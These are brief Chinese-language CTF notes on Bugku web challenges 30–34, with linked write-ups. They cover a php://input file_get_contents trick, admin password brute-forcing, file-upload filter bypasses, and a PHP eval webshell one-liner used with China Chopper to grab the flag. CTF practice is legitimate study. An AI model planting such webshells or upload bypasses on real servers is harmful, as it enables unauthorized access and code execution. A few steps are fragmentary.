【说明】 整合资源 简略版本2020Bugku write up
web30
 关键字: txt or file_get_contents(fn)知识点:filegetcontents(fn) 知识点: file_get_contents(fn)知识点:filegetcontents(fn) 联想 php://input
 步骤:
 1.1 可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容
2.1 根据提示 ?ac=bugku&fn=flag.txt
 https://blog.csdn.net/baidu_39504221/article/details/111578802
web 31 好像需要管理员
 构造 提示:/resusl.php?x=admin
 步骤:1.抓包
- 打开发现代码 爆破密码passwd : admin
web 32 (无解)
 关键字:
 知识点:
 步骤:头部Content-Type: multipart/form-data;中的multipart改成Multipart,即Content-Type: Multipart/form-data;,再将上传文件的后缀改成php4,最后再改改Content-Type: image/png
 参考链接:https://blog.csdn.net/s11show_163/article/details/104585686
 https://blog.csdn.net/EC_Carrot/article/details/111630819
 知识点:https://blog.csdn.net/lilongsy/article/details/108149819
web 33
 关键字: php加解密
 https://blog.csdn.net/weixin_33682790/article/details/94573445
web 34
 关键字: 中国菜刀 病毒脚本拿权限
 知识点: view-source
步骤:
 1.view-source发现 upload.php
 2.一句话上传病毒 <?php phpinfo(); eval($_POST['test']); ?> 发现<?php ?>一头一尾被替换
 3.修改为 上传
 4.上传后成功绕过
5.首页右键添加 选择php脚本 填写test密码
6.在根目录里面找到flag
https://blog.csdn.net/baidu_39504221/article/details/111593339
未完待续